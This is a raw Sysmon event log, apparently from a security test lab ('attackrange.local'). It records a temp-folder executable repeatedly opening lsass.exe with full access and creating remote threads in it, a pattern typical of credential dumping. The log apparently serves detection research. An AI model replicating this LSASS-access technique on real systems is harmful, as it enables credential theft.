15:52:58.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005220Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.950{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005219Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.950{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-0F01-000000008801}5004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005218Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.950{D28789B6-7CDA-5FA1-0E01-000000008801}15924532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CDA-5FA1-0F01-000000008801}5004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005217Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.955{D28789B6-7CDA-5FA1-0F01-000000008801}5004C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 824800x80000000000000005216Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.950{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe44640x00000161B50D082C-- 10341000x80000000000000005215Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.950{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005214Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.934{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe6560x00000161B50D082C-- 10341000x80000000000000005213Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.934{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005212Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.918{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe33760x00000161B50D082C-- 10341000x80000000000000005211Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.918{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005210Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.887{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe49920x00000161B50D082C-- 10341000x80000000000000005209Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.887{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005208Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.871{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe35520x00000161B50D082C-- 10341000x80000000000000005207Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.871{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005206Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.856{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe25280x00000161B50D082C-- 10341000x80000000000000005205Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.856{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005204Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.840{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe27920x00000161B50D082C-- 10341000x80000000000000005203Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.840{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005202Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.824{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe7320x00000161B50D082C-- 10341000x80000000000000005201Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.824{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005200Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.809{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe27160x00000161B50D082C-- 10341000x80000000000000005199Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.809{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005198Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.793{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe26080x00000161B50D082C-- 10341000x80000000000000005197Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.793{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005196Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.777{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe50520x00000161B50D082C-- 10341000x80000000000000005195Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.777{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005194Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.762{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe28680x00000161B50D082C-- 10341000x80000000000000005193Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.762{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005192Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.746{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe13600x00000161B50D082C-- 10341000x80000000000000005191Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.746{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005190Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.730{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe22720x00000161B50D082C-- 10341000x80000000000000005189Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.730{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005188Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.715{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe19680x00000161B50D082C-- 10341000x80000000000000005187Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.715{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005186Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 